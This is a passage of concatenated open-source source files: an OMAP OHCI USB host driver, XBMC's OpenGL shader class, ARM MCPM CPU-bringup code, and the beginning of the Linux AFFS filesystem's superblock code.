* This file is licenced under the GPL.
*/
#include <linux/signal.h> /* IRQF_DISABLED */
#include <linux/jiffies.h>
#include <linux/platform_device.h>
#include <linux/clk.h>
#include <asm/hardware.h>
#include <asm/io.h>
#include <asm/mach-types.h>
#include <asm/arch/mux.h>
#include <asm/arch/irqs.h>
#include <asm/arch/gpio.h>
#include <asm/arch/fpga.h>
#include <asm/arch/usb.h>
/* OMAP-1510 OHCI has its own MMU for DMA */
#define OMAP1510_LB_MEMSIZE 32 /* Should be same as SDRAM size */
#define OMAP1510_LB_CLOCK_DIV 0xfffec10c
#define OMAP1510_LB_MMU_CTL 0xfffec208
#define OMAP1510_LB_MMU_LCK 0xfffec224
#define OMAP1510_LB_MMU_LD_TLB 0xfffec228
#define OMAP1510_LB_MMU_CAM_H 0xfffec22c
#define OMAP1510_LB_MMU_CAM_L 0xfffec230
#define OMAP1510_LB_MMU_RAM_H 0xfffec234
#define OMAP1510_LB_MMU_RAM_L 0xfffec238
#ifndef CONFIG_ARCH_OMAP
#error "This file is OMAP bus glue.  CONFIG_ARCH_OMAP must be defined."
#endif
#ifdef CONFIG_TPS65010
#include <linux/i2c/tps65010.h>
#else
#define LOW 0
#define HIGH 1
#define GPIO1 1
/* No-op stub used when the TPS65010 power chip driver is not configured. */
static inline int tps65010_set_gpio_out_value(unsigned gpio, unsigned value)
{
	return 0;
}
#endif
extern int usb_disabled(void);
extern int ocpi_enable(void);
static struct clk *usb_host_ck;
static struct clk *usb_dc_ck;
static int host_enabled;
static int host_initialized;
/*
 * Gate both USB clocks together: dc clock before host clock on enable,
 * the reverse order on disable, with a settling delay after power-on.
 */
static void omap_ohci_clock_power(int on)
{
	if (on) {
		clk_enable(usb_dc_ck);
		clk_enable(usb_host_ck);
		/* guesstimate for T5 == 1x 32K clock + APLL lock time */
		udelay(100);
	} else {
		clk_disable(usb_host_ck);
		clk_disable(usb_dc_ck);
	}
}
/*
 * Board specific gang-switched transceiver power on/off.
 * NOTE: OSK supplies power from DC, not battery.
 *
 * Innovator/1510: toggles the two USB enable bits in the camera/USB FPGA
 * register.  OSK: drives TPS65010 GPIO1 low to power on, high to power off.
 * Always returns 0.
 */
static int omap_ohci_transceiver_power(int on)
{
	if (on) {
		if (machine_is_omap_innovator() && cpu_is_omap1510())
			fpga_write(fpga_read(INNOVATOR_FPGA_CAM_USB_CONTROL)
				| ((1 << 5/*usb1*/) | (1 << 3/*usb2*/)),
			       INNOVATOR_FPGA_CAM_USB_CONTROL);
		else if (machine_is_omap_osk())
			tps65010_set_gpio_out_value(GPIO1, LOW);
	} else {
		if (machine_is_omap_innovator() && cpu_is_omap1510())
			fpga_write(fpga_read(INNOVATOR_FPGA_CAM_USB_CONTROL)
				& ~((1 << 5/*usb1*/) | (1 << 3/*usb2*/)),
			       INNOVATOR_FPGA_CAM_USB_CONTROL);
		else if (machine_is_omap_osk())
			tps65010_set_gpio_out_value(GPIO1, HIGH);
	}

	return 0;
}
#ifdef CONFIG_ARCH_OMAP15XX
/*
 * OMAP-1510 specific Local Bus clock on/off
 *
 * Writes the LB MMU control register: bits 0-1 set to enable (with a
 * settling delay), cleared to disable.  Always returns 0.
 */
static int omap_1510_local_bus_power(int on)
{
	if (on) {
		omap_writel((1 << 1) | (1 << 0), OMAP1510_LB_MMU_CTL);
		udelay(200);
	} else {
		omap_writel(0, OMAP1510_LB_MMU_CTL);
	}

	return 0;
}
/*
 * OMAP-1510 specific Local Bus initialization
 * NOTE: This assumes 32MB memory size in OMAP1510LB_MEMSIZE.
 * See also arch/mach-omap/memory.h for __virt_to_dma() and
 * __dma_to_virt() which need to match with the physical
 * Local Bus address below.
 *
 * Programs one TLB entry per 1MB page, mapping the Local Bus window onto
 * physical SDRAM, then enables the MMU walking table.  Always returns 0.
 */
static int omap_1510_local_bus_init(void)
{
	unsigned int tlb;
	unsigned long lbaddr, physaddr;

	/* set the LB clock divisor */
	omap_writel((omap_readl(OMAP1510_LB_CLOCK_DIV) & 0xfffffff8) | 0x4,
	       OMAP1510_LB_CLOCK_DIV);

	/* Configure the Local Bus MMU table */
	for (tlb = 0; tlb < OMAP1510_LB_MEMSIZE; tlb++) {
		lbaddr = tlb * 0x00100000 + OMAP1510_LB_OFFSET;
		physaddr = tlb * 0x00100000 + PHYS_OFFSET;
		/* load one CAM/RAM entry and latch it into the TLB */
		omap_writel((lbaddr & 0x0fffffff) >> 22, OMAP1510_LB_MMU_CAM_H);
		omap_writel(((lbaddr & 0x003ffc00) >> 6) | 0xc,
		       OMAP1510_LB_MMU_CAM_L);
		omap_writel(physaddr >> 16, OMAP1510_LB_MMU_RAM_H);
		omap_writel((physaddr & 0x0000fc00) | 0x300, OMAP1510_LB_MMU_RAM_L);
		omap_writel(tlb << 4, OMAP1510_LB_MMU_LCK);
		omap_writel(0x1, OMAP1510_LB_MMU_LD_TLB);
	}

	/* Enable the walking table */
	omap_writel(omap_readl(OMAP1510_LB_MMU_CTL) | (1 << 3), OMAP1510_LB_MMU_CTL);
	udelay(200);

	return 0;
}
#else
#define omap_1510_local_bus_power(x) {}
#define omap_1510_local_bus_init() {}
#endif
#ifdef CONFIG_USB_OTG
/*
 * Kick off OTG Host Negotiation Protocol: after telling the transceiver
 * to start HNP, suspend the OTG root-hub port and drop the A-device bus
 * request.  The register updates run under local_irq_save so the state
 * change is atomic on this CPU.
 */
static void start_hnp(struct ohci_hcd *ohci)
{
	const unsigned	port = ohci_to_hcd(ohci)->self.otg_port - 1;
	unsigned long	flags;

	otg_start_hnp(ohci->transceiver);

	local_irq_save(flags);
	ohci->transceiver->state = OTG_STATE_A_SUSPEND;
	writel (RH_PS_PSS, &ohci->regs->roothub.portstatus [port]);
	OTG_CTRL_REG &= ~OTG_A_BUSREQ;
	local_irq_restore(flags);
}
#endif
/*-------------------------------------------------------------------------*/
/*
 * hc_driver .reset hook: bring up the OMAP OHCI controller.  Sets up the
 * OTG transceiver when required, powers clocks (plus the 1510 local bus),
 * runs the generic ohci_init(), and applies board-specific root-hub
 * power-switching / overcurrent policy.
 */
static int ohci_omap_init(struct usb_hcd *hcd)
{
	struct ohci_hcd		*ohci = hcd_to_ohci(hcd);
	struct omap_usb_config	*config = hcd->self.controller->platform_data;
	int			need_transceiver = (config->otg != 0);
	int			ret;

	dev_dbg(hcd->self.controller, "starting USB Controller\n");

	if (config->otg) {
		ohci_to_hcd(ohci)->self.otg_port = config->otg;
		/* default/minimum OTG power budget: 8 mA */
		ohci_to_hcd(ohci)->power_budget = 8;
	}

	/* boards can use OTG transceivers in non-OTG modes */
	need_transceiver = need_transceiver
			|| machine_is_omap_h2() || machine_is_omap_h3();

	if (cpu_is_omap16xx())
		ocpi_enable();

#ifdef	CONFIG_ARCH_OMAP_OTG
	if (need_transceiver) {
		ohci->transceiver = otg_get_transceiver();
		if (ohci->transceiver) {
			int	status = otg_set_host(ohci->transceiver,
						&ohci_to_hcd(ohci)->self);
			dev_dbg(hcd->self.controller, "init %s transceiver, status %d\n",
					ohci->transceiver->label, status);
			if (status) {
				/* drop the reference taken above on failure */
				if (ohci->transceiver)
					put_device(ohci->transceiver->dev);
				return status;
			}
		} else {
			dev_err(hcd->self.controller, "can't find transceiver\n");
			return -ENODEV;
		}
	}
#endif

	omap_ohci_clock_power(1);

	if (cpu_is_omap1510()) {
		omap_1510_local_bus_power(1);
		omap_1510_local_bus_init();
	}

	if ((ret = ohci_init(ohci)) < 0)
		return ret;

	/* board-specific power switching and overcurrent support */
	if (machine_is_omap_osk() || machine_is_omap_innovator()) {
		u32	rh = roothub_a (ohci);

		/* power switching (ganged by default) */
		rh &= ~RH_A_NPS;

		/* TPS2045 switch for internal transceiver (port 1) */
		if (machine_is_omap_osk()) {
			ohci_to_hcd(ohci)->power_budget = 250;

			rh &= ~RH_A_NOCP;

			/* gpio9 for overcurrent detection */
			omap_cfg_reg(W8_1610_GPIO9);
			omap_request_gpio(9);
			omap_set_gpio_direction(9, 1 /* IN */);

			/* for paranoia's sake: disable USB.PUEN */
			omap_cfg_reg(W4_USB_HIGHZ);
		}
		ohci_writel(ohci, rh, &ohci->regs->roothub.a);
		distrust_firmware = 0;
	} else if (machine_is_nokia770()) {
		/* We require a self-powered hub, which should have
		 * plenty of power. */
		ohci_to_hcd(ohci)->power_budget = 0;
	}

	/* FIXME khubd hub requests should manage power switching */
	omap_ohci_transceiver_power(1);

	/* board init will have already handled HMC and mux setup.
	 * any external transceiver should already be initialized
	 * too, so all configured ports use the right signaling now.
	 */

	return 0;
}
/* hc_driver .stop hook: power down the USB clocks. */
static void ohci_omap_stop(struct usb_hcd *hcd)
{
	dev_dbg(hcd->self.controller, "stopping USB Controller\n");
	omap_ohci_clock_power(0);
}
/*-------------------------------------------------------------------------*/
/**
 * usb_hcd_omap_probe - initialize OMAP-based HCDs
 * @driver: hc_driver to bind to the new hcd
 * @pdev: platform device carrying one MEM and one IRQ resource
 * Context: !in_interrupt()
 *
 * Allocates basic resources for this USB host controller, and
 * then invokes the start() method for the HCD associated with it
 * through the hotplug entry's driver_data.
 *
 * Returns 0 on success or a negative errno; on failure all clocks,
 * memory regions and the hcd allocation are released again.
 */
static int usb_hcd_omap_probe (const struct hc_driver *driver,
			  struct platform_device *pdev)
{
	int retval, irq;
	struct usb_hcd *hcd = 0;
	struct ohci_hcd *ohci;

	/* exactly one memory window plus one interrupt is expected */
	if (pdev->num_resources != 2) {
		printk(KERN_ERR "hcd probe: invalid num_resources: %i\n",
		       pdev->num_resources);
		return -ENODEV;
	}

	if (pdev->resource[0].flags != IORESOURCE_MEM
			|| pdev->resource[1].flags != IORESOURCE_IRQ) {
		printk(KERN_ERR "hcd probe: invalid resource type\n");
		return -ENODEV;
	}

	usb_host_ck = clk_get(0, "usb_hhc_ck");
	if (IS_ERR(usb_host_ck))
		return PTR_ERR(usb_host_ck);

	/* the 1510 has no dedicated dc clock; it uses the local-bus clock */
	if (!cpu_is_omap1510())
		usb_dc_ck = clk_get(0, "usb_dc_ck");
	else
		usb_dc_ck = clk_get(0, "lb_ck");

	if (IS_ERR(usb_dc_ck)) {
		clk_put(usb_host_ck);
		return PTR_ERR(usb_dc_ck);
	}

	hcd = usb_create_hcd (driver, &pdev->dev, pdev->dev.bus_id);
	if (!hcd) {
		retval = -ENOMEM;
		goto err0;
	}
	hcd->rsrc_start = pdev->resource[0].start;
	hcd->rsrc_len = pdev->resource[0].end - pdev->resource[0].start + 1;

	if (!request_mem_region(hcd->rsrc_start, hcd->rsrc_len, hcd_name)) {
		dev_dbg(&pdev->dev, "request_mem_region failed\n");
		retval = -EBUSY;
		goto err1;
	}

	/* registers are statically mapped; no ioremap needed */
	hcd->regs = (void __iomem *) (int) IO_ADDRESS(hcd->rsrc_start);

	ohci = hcd_to_ohci(hcd);
	ohci_hcd_init(ohci);

	host_initialized = 0;
	host_enabled = 1;

	irq = platform_get_irq(pdev, 0);
	if (irq < 0) {
		retval = -ENXIO;
		goto err2;
	}
	retval = usb_add_hcd(hcd, irq, IRQF_DISABLED);
	if (retval)
		goto err2;

	host_initialized = 1;

	if (!host_enabled)
		omap_ohci_clock_power(0);

	return 0;
err2:
	release_mem_region(hcd->rsrc_start, hcd->rsrc_len);
err1:
	usb_put_hcd(hcd);
err0:
	clk_put(usb_dc_ck);
	clk_put(usb_host_ck);
	return retval;
}
/* may be called with controller, bus, and devices active */

/**
 * usb_hcd_omap_remove - shutdown processing for OMAP-based HCDs
 * @hcd: USB Host Controller being removed
 * @pdev: platform device the controller was probed from
 * Context: !in_interrupt()
 *
 * Reverses the effect of usb_hcd_omap_probe(), first invoking
 * the HCD's stop() method.  It is always called from a thread
 * context, normally "rmmod", "apmd", or something similar.
 */
static inline void
usb_hcd_omap_remove (struct usb_hcd *hcd, struct platform_device *pdev)
{
	struct ohci_hcd		*ohci = hcd_to_ohci (hcd);

	usb_remove_hcd(hcd);
	/* release the OTG transceiver reference taken in ohci_omap_init() */
	if (ohci->transceiver) {
		(void) otg_set_host(ohci->transceiver, 0);
		put_device(ohci->transceiver->dev);
	}
	/* free the overcurrent-detect gpio claimed in ohci_omap_init() */
	if (machine_is_omap_osk())
		omap_free_gpio(9);
	release_mem_region(hcd->rsrc_start, hcd->rsrc_len);
	usb_put_hcd(hcd);
	clk_put(usb_dc_ck);
	clk_put(usb_host_ck);
}
/*-------------------------------------------------------------------------*/
/*
 * hc_driver .start hook: optionally arm remote wakeup (OTG or rwc boards)
 * and run the generic OHCI start.  Skipped entirely when the host side
 * was disabled at probe time.
 */
static int
ohci_omap_start (struct usb_hcd *hcd)
{
	struct omap_usb_config *config;
	struct ohci_hcd	*ohci = hcd_to_ohci (hcd);
	int		ret;

	if (!host_enabled)
		return 0;
	config = hcd->self.controller->platform_data;
	if (config->otg || config->rwc) {
		ohci->hc_control = OHCI_CTRL_RWC;
		writel(OHCI_CTRL_RWC, &ohci->regs->control);
	}

	if ((ret = ohci_run (ohci)) < 0) {
		dev_err(hcd->self.controller, "can't start\n");
		ohci_stop (hcd);
		return ret;
	}
	return 0;
}
/*-------------------------------------------------------------------------*/
/* OHCI host-controller driver ops, with the OMAP-specific hooks plugged in. */
static const struct hc_driver ohci_omap_hc_driver = {
	.description =		hcd_name,
	.product_desc =		"OMAP OHCI",
	.hcd_priv_size =	sizeof(struct ohci_hcd),

	/*
	 * generic hardware linkage
	 */
	.irq =			ohci_irq,
	.flags =		HCD_USB11 | HCD_MEMORY,

	/*
	 * basic lifecycle operations
	 */
	.reset =		ohci_omap_init,
	.start =		ohci_omap_start,
	.stop =			ohci_omap_stop,
	.shutdown =		ohci_shutdown,

	/*
	 * managing i/o requests and associated device resources
	 */
	.urb_enqueue =		ohci_urb_enqueue,
	.urb_dequeue =		ohci_urb_dequeue,
	.endpoint_disable =	ohci_endpoint_disable,

	/*
	 * scheduling support
	 */
	.get_frame_number =	ohci_get_frame,

	/*
	 * root hub support
	 */
	.hub_status_data =	ohci_hub_status_data,
	.hub_control =		ohci_hub_control,
	.hub_irq_enable =	ohci_rhsc_enable,
#ifdef	CONFIG_PM
	.bus_suspend =		ohci_bus_suspend,
	.bus_resume =		ohci_bus_resume,
#endif
	.start_port_reset =	ohci_start_port_reset,
};
/*-------------------------------------------------------------------------*/
/* platform_driver .probe: thin wrapper binding our hc_driver to the device. */
static int ohci_hcd_omap_drv_probe(struct platform_device *dev)
{
	return usb_hcd_omap_probe(&ohci_omap_hc_driver, dev);
}
/* platform_driver .remove: tear down the hcd and clear the drvdata link. */
static int ohci_hcd_omap_drv_remove(struct platform_device *dev)
{
	struct usb_hcd		*hcd = platform_get_drvdata(dev);

	usb_hcd_omap_remove(hcd, dev);
	platform_set_drvdata(dev, NULL);

	return 0;
}
/*-------------------------------------------------------------------------*/
#ifdef CONFIG_PM
/*
 * Platform suspend: wait out any pending root-hub state change, then cut
 * the clocks and mark the hcd suspended.
 */
static int ohci_omap_suspend(struct platform_device *dev, pm_message_t message)
{
	struct ohci_hcd	*ohci = hcd_to_ohci(platform_get_drvdata(dev));

	if (time_before(jiffies, ohci->next_statechange))
		msleep(5);
	ohci->next_statechange = jiffies;

	omap_ohci_clock_power(0);
	ohci_to_hcd(ohci)->state = HC_STATE_SUSPENDED;
	dev->dev.power.power_state = PMSG_SUSPEND;
	return 0;
}
/*
 * Platform resume: restore the clocks and let the root hub resume;
 * mirrors ohci_omap_suspend().
 */
static int ohci_omap_resume(struct platform_device *dev)
{
	struct ohci_hcd	*ohci = hcd_to_ohci(platform_get_drvdata(dev));

	if (time_before(jiffies, ohci->next_statechange))
		msleep(5);
	ohci->next_statechange = jiffies;

	omap_ohci_clock_power(1);
	dev->dev.power.power_state = PMSG_ON;
	usb_hcd_resume_root_hub(platform_get_drvdata(dev));
	return 0;
}
#endif
/*-------------------------------------------------------------------------*/
/*
 * Driver definition to register with the OMAP bus
 */
static struct platform_driver ohci_hcd_omap_driver = {
	.probe		= ohci_hcd_omap_drv_probe,
	.remove		= ohci_hcd_omap_drv_remove,
	.shutdown	= usb_hcd_platform_shutdown,
#ifdef	CONFIG_PM
	.suspend	= ohci_omap_suspend,
	.resume		= ohci_omap_resume,
#endif
	.driver		= {
		.owner	= THIS_MODULE,
		.name	= "ohci",
	},
};
MODULE_ALIAS("platform:ohci");
| gpl-2.0 |
PimentNoir/xbmc | xbmc/rendering/gl/GLShader.cpp | 3 | 6095 | /*
* Copyright (C) 2005-2017 Team XBMC
* http://xbmc.org
*
* This Program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2, or (at your option)
* any later version.
*
* This Program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with XBMC; see the file COPYING. If not, see
* <http://www.gnu.org/licenses/>.
*
*/
#include "system.h"
#include "GLShader.h"
#include "ServiceBroker.h"
#include "utils/log.h"
#include "rendering/RenderSystem.h"
#include "guilib/GraphicContext.h"
#include "guilib/MatrixGLES.h"
using namespace Shaders;
// Convenience constructor: pairs the stock GUI vertex shader with the given
// fragment shader source by delegating to the two-argument constructor.
CGLShader::CGLShader(const char *shader)
  : CGLShader("gl_shader_vert.glsl", shader)
{
}
// General constructor: explicit vertex and fragment shader sources.
// Clip state starts disabled until OnEnabled() proves it is usable.
CGLShader::CGLShader(const char *vshader, const char *fshader)
  : CGLSLShaderProgram(vshader, fshader),
    m_proj(nullptr),
    m_model(nullptr),
    m_clipPossible(false)
{
}
// Cache uniform/attribute locations and bind the two sampler uniforms to
// texture units 0 and 1 (done once; the bindings never change).
void CGLShader::OnCompiledAndLinked()
{
  // This is called after CompileAndLink()

  // Variables passed directly to the Fragment shader
  m_hTex0 = glGetUniformLocation(ProgramHandle(), "m_samp0");
  m_hTex1 = glGetUniformLocation(ProgramHandle(), "m_samp1");
  m_hUniCol = glGetUniformLocation(ProgramHandle(), "m_unicol");

  // Variables passed directly to the Vertex shader
  m_hProj = glGetUniformLocation(ProgramHandle(), "m_proj");
  m_hModel = glGetUniformLocation(ProgramHandle(), "m_model");

  // Vertex attributes
  m_hPos = glGetAttribLocation(ProgramHandle(), "m_attrpos");
  m_hCol = glGetAttribLocation(ProgramHandle(), "m_attrcol");
  m_hCord0 = glGetAttribLocation(ProgramHandle(), "m_attrcord0");
  m_hCord1 = glGetAttribLocation(ProgramHandle(), "m_attrcord1");

  // It's okay to do this only one time. Textures units never change.
  glUseProgram(ProgramHandle());
  glUniform1i(m_hTex0, 0);
  glUniform1i(m_hTex1, 1);
  glUniform4f(m_hUniCol, 1.0, 1.0, 1.0, 1.0);
  glUseProgram(0);
}
// Upload the projection/model-view matrices, then decide whether glScissor
// clipping is usable and, if so, precompute the linear GUI->window mapping
// (m_clipX/YFactor, m_clipX/YOffset).  Always returns true.
bool CGLShader::OnEnabled()
{
  // This is called after glUseProgram()

  GLfloat *projMatrix = glMatrixProject.Get().m_pMatrix;
  GLfloat *modelMatrix = glMatrixModview.Get().m_pMatrix;
  glUniformMatrix4fv(m_hProj, 1, GL_FALSE, projMatrix);
  glUniformMatrix4fv(m_hModel, 1, GL_FALSE, modelMatrix);

  const TransformMatrix &guiMatrix = g_graphicsContext.GetGUIMatrix();
  CRect viewPort; // absolute positions of corners
  CServiceBroker::GetRenderSystem().GetViewPort(viewPort);

  /* glScissor operates in window coordinates. In order that we can use it to
   * perform clipping, we must ensure that there is an independent linear
   * transformation from the coordinate system used by CGraphicContext::ClipRect
   * to window coordinates, separately for X and Y (in other words, no
   * rotation or shear is introduced at any stage). To do, this, we need to
   * check that zeros are present in the following locations:
   *
   * GUI matrix:
   * / * 0 * * \
   * | 0 * * * |
   * \ 0 0 * * /
   *       ^ TransformMatrix::TransformX/Y/ZCoord are only ever called with
   *         input z = 0, so this column doesn't matter
   * Model-view matrix:
   * / * 0 0 * \
   * | 0 * 0 * |
   * | 0 0 * * |
   * \ * * * * /  <- eye w has no influence on window x/y (last column below
   *                 is either 0 or ignored)
   * Projection matrix:
   * / * 0 0 0 \
   * | 0 * 0 0 |
   * | * * * * |  <- normalised device coordinate z has no influence on window x/y
   * \ 0 0 * 0 /
   *
   * Some of these zeros are not strictly required to ensure this, but they tend
   * to be zeroed in the common case, so by checking for zeros here, we simplify
   * the calculation of the window x/y coordinates further down the line.
   *
   * (Minor detail: we don't quite deal in window coordinates as defined by
   * OpenGL, because CRenderSystemGLES::SetScissors flips the Y axis. But all
   * that's needed to handle that is an effective negation at the stage where
   * Y is in normalised device coordinates.)
   */
  m_clipPossible = guiMatrix.m[0][1] == 0 &&
      guiMatrix.m[1][0] == 0 &&
      guiMatrix.m[2][0] == 0 &&
      guiMatrix.m[2][1] == 0 &&
      modelMatrix[0+1*4] == 0 &&
      modelMatrix[0+2*4] == 0 &&
      modelMatrix[1+0*4] == 0 &&
      modelMatrix[1+2*4] == 0 &&
      modelMatrix[2+0*4] == 0 &&
      modelMatrix[2+1*4] == 0 &&
      projMatrix[0+1*4] == 0 &&
      projMatrix[0+2*4] == 0 &&
      projMatrix[0+3*4] == 0 &&
      projMatrix[1+0*4] == 0 &&
      projMatrix[1+2*4] == 0 &&
      projMatrix[1+3*4] == 0 &&
      projMatrix[3+0*4] == 0 &&
      projMatrix[3+1*4] == 0 &&
      projMatrix[3+3*4] == 0;

  // defaults when clipping is not possible
  m_clipXFactor = 0.0;
  m_clipXOffset = 0.0;
  m_clipYFactor = 0.0;
  m_clipYOffset = 0.0;

  if (m_clipPossible)
  {
    // compose GUI * model-view * projection per axis...
    m_clipXFactor = guiMatrix.m[0][0] * modelMatrix[0+0*4] * projMatrix[0+0*4];
    m_clipXOffset = (guiMatrix.m[0][3] * modelMatrix[0+0*4] + modelMatrix[0+3*4]) * projMatrix[0+0*4];
    m_clipYFactor = guiMatrix.m[1][1] * modelMatrix[1+1*4] * projMatrix[1+1*4];
    m_clipYOffset = (guiMatrix.m[1][3] * modelMatrix[1+1*4] + modelMatrix[1+3*4]) * projMatrix[1+1*4];
    // ...then divide by clip w and map NDC into the viewport rectangle
    float clipW = (guiMatrix.m[2][3] * modelMatrix[2+2*4] + modelMatrix[2+3*4]) * projMatrix[3+2*4];
    float xMult = (viewPort.x2 - viewPort.x1) / (2 * clipW);
    float yMult = (viewPort.y1 - viewPort.y2) / (2 * clipW); // correct for inverted window coordinate scheme
    m_clipXFactor = m_clipXFactor * xMult;
    m_clipXOffset = m_clipXOffset * xMult + (viewPort.x2 + viewPort.x1) / 2;
    m_clipYFactor = m_clipYFactor * yMult;
    m_clipYOffset = m_clipYOffset * yMult + (viewPort.y2 + viewPort.y1) / 2;
  }

  return true;
}
// Release shader resources; forwards to the base-class cleanup.
void CGLShader::Free()
{
  // Do Cleanup here
  CGLSLShaderProgram::Free();
}
| gpl-2.0 |
raininja/android_kernel_asus_a500cg | arch/arm/common/mcpm_platsmp.c | 2051 | 2211 | /*
* linux/arch/arm/mach-vexpress/mcpm_platsmp.c
*
* Created by: Nicolas Pitre, November 2012
* Copyright: (C) 2012-2013 Linaro Limited
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* Code to handle secondary CPU bringup and hotplug for the cluster power API.
*/
#include <linux/init.h>
#include <linux/smp.h>
#include <linux/spinlock.h>
#include <asm/mcpm.h>
#include <asm/smp.h>
#include <asm/smp_plat.h>
/* smp_init_cpus hook: nothing to enumerate here. */
static void __init simple_smp_init_cpus(void)
{
}
/*
 * Bring a secondary CPU out of reset via the MCPM cluster power API:
 * clear any stale entry vector, power the CPU up, arm the real entry
 * vector, then send a wakeup IPI + SEV in case the CPU was only sleeping.
 *
 * Returns 0 on success or the negative error from mcpm_cpu_power_up().
 */
static int __cpuinit mcpm_boot_secondary(unsigned int cpu, struct task_struct *idle)
{
	unsigned int mpidr, pcpu, pcluster;
	int ret;	/* int, not unsigned: carries a negative error code */
	extern void secondary_startup(void);

	mpidr = cpu_logical_map(cpu);
	pcpu = MPIDR_AFFINITY_LEVEL(mpidr, 0);
	pcluster = MPIDR_AFFINITY_LEVEL(mpidr, 1);
	pr_debug("%s: logical CPU %d is physical CPU %d cluster %d\n",
		 __func__, cpu, pcpu, pcluster);

	mcpm_set_entry_vector(pcpu, pcluster, NULL);

	ret = mcpm_cpu_power_up(pcpu, pcluster);
	if (ret)
		return ret;
	mcpm_set_entry_vector(pcpu, pcluster, secondary_startup);
	arch_send_wakeup_ipi_mask(cpumask_of(cpu));
	dsb_sev();
	return 0;
}
/* Runs on the freshly booted CPU: report it powered up to the MCPM layer. */
static void __cpuinit mcpm_secondary_init(unsigned int cpu)
{
	mcpm_cpu_powered_up();
}
#ifdef CONFIG_HOTPLUG_CPU
/* Hotplug check: may this CPU be taken offline?  Always yes here. */
static int mcpm_cpu_disable(unsigned int cpu)
{
	/*
	 * We assume all CPUs may be shut down.
	 * This would be the hook to use for eventual Secure
	 * OS migration requests as described in the PSCI spec.
	 */
	return 0;
}
/*
 * Final step of CPU hotplug-off, running on the dying CPU itself:
 * clear its entry vector and power it down through MCPM.
 */
static void mcpm_cpu_die(unsigned int cpu)
{
	unsigned int mpidr, pcpu, pcluster;

	mpidr = read_cpuid_mpidr();
	pcpu = MPIDR_AFFINITY_LEVEL(mpidr, 0);
	pcluster = MPIDR_AFFINITY_LEVEL(mpidr, 1);
	mcpm_set_entry_vector(pcpu, pcluster, NULL);
	mcpm_cpu_power_down();
}
/* SMP operations backed by the MCPM cluster power API. */
static struct smp_operations __initdata mcpm_smp_ops = {
	.smp_init_cpus		= simple_smp_init_cpus,
	.smp_boot_secondary	= mcpm_boot_secondary,
	.smp_secondary_init	= mcpm_secondary_init,
#ifdef CONFIG_HOTPLUG_CPU
	.cpu_disable		= mcpm_cpu_disable,
	.cpu_die		= mcpm_cpu_die,
#endif
};
/* Install the MCPM-backed SMP operations as the platform's smp_ops. */
void __init mcpm_smp_set_ops(void)
{
	smp_set_ops(&mcpm_smp_ops);
}
| gpl-2.0 |
aosp-armani/kernel_msm_armani | fs/affs/super.c | 4611 | 14957 | /*
* linux/fs/affs/inode.c
*
* (c) 1996 Hans-Joachim Widmaier - Rewritten
*
* (C) 1993 Ray Burr - Modified for Amiga FFS filesystem.
*
* (C) 1992 Eric Youngdale Modified for ISO 9660 filesystem.
*
* (C) 1991 Linus Torvalds - minix filesystem
*/
#include <linux/module.h>
#include <linux/init.h>
#include <linux/statfs.h>
#include <linux/parser.h>
#include <linux/magic.h>
#include <linux/sched.h>
#include <linux/slab.h>
#include "affs.h"
extern struct timezone sys_tz;
static int affs_statfs(struct dentry *dentry, struct kstatfs *buf);
static int affs_remount (struct super_block *sb, int *flags, char *data);
/*
 * Flush the root block: record the bitmap state (@clean) and the
 * last-change timestamp in the root tail, fix up the checksum and mark
 * the buffer dirty - synchronously when @wait is set.
 */
static void
affs_commit_super(struct super_block *sb, int wait, int clean)
{
	struct affs_sb_info *sbi = AFFS_SB(sb);
	struct buffer_head *bh = sbi->s_root_bh;
	struct affs_root_tail *tail = AFFS_ROOT_TAIL(sb, bh);

	tail->bm_flag = cpu_to_be32(clean);
	secs_to_datestamp(get_seconds(), &tail->disk_change);
	affs_fix_checksum(sb, bh);
	mark_buffer_dirty(bh);
	if (wait)
		sync_dirty_buffer(bh);
}
/*
 * Unmount: commit the super (clean=1) if writable and dirty, then release
 * the prefix string, bitmap, root buffer and the sb private info.
 */
static void
affs_put_super(struct super_block *sb)
{
	struct affs_sb_info *sbi = AFFS_SB(sb);
	pr_debug("AFFS: put_super()\n");

	if (!(sb->s_flags & MS_RDONLY) && sb->s_dirt)
		affs_commit_super(sb, 1, 1);

	kfree(sbi->s_prefix);
	affs_free_bitmap(sb);
	affs_brelse(sbi->s_root_bh);
	kfree(sbi);
	sb->s_fs_info = NULL;
}
/* Periodic writeback: commit the super (clean=2) and clear the dirty flag. */
static void
affs_write_super(struct super_block *sb)
{
	lock_super(sb);
	if (!(sb->s_flags & MS_RDONLY))
		affs_commit_super(sb, 1, 2);
	sb->s_dirt = 0;
	unlock_super(sb);

	pr_debug("AFFS: write_super() at %lu, clean=2\n", get_seconds());
}
/* sync_fs hook: like affs_write_super() but honours @wait.  Always 0. */
static int
affs_sync_fs(struct super_block *sb, int wait)
{
	lock_super(sb);
	affs_commit_super(sb, wait, 2);
	sb->s_dirt = 0;
	unlock_super(sb);
	return 0;
}
static struct kmem_cache * affs_inode_cachep;
/* Allocate an AFFS in-core inode from the slab and reset its private fields. */
static struct inode *affs_alloc_inode(struct super_block *sb)
{
	struct affs_inode_info *ei;

	ei = kmem_cache_alloc(affs_inode_cachep, GFP_KERNEL);
	if (!ei)
		return NULL;

	ei->vfs_inode.i_version = 1;
	ei->i_lc = NULL;
	ei->i_ext_bh = NULL;
	ei->i_pa_cnt = 0;

	return &ei->vfs_inode;
}
/* RCU callback: return the inode's slab object once the grace period ends. */
static void affs_i_callback(struct rcu_head *head)
{
	struct inode *inode = container_of(head, struct inode, i_rcu);
	kmem_cache_free(affs_inode_cachep, AFFS_I(inode));
}
/* Defer the actual free to RCU so lockless readers stay safe. */
static void affs_destroy_inode(struct inode *inode)
{
	call_rcu(&inode->i_rcu, affs_i_callback);
}
/* Slab constructor: runs once per object, not per allocation. */
static void init_once(void *foo)
{
	struct affs_inode_info *ei = (struct affs_inode_info *) foo;

	sema_init(&ei->i_link_lock, 1);
	sema_init(&ei->i_ext_lock, 1);
	inode_init_once(&ei->vfs_inode);
}
/* Create the slab cache that backs AFFS in-core inodes. */
static int init_inodecache(void)
{
	affs_inode_cachep = kmem_cache_create("affs_inode_cache",
					      sizeof(struct affs_inode_info),
					      0, (SLAB_RECLAIM_ACCOUNT|
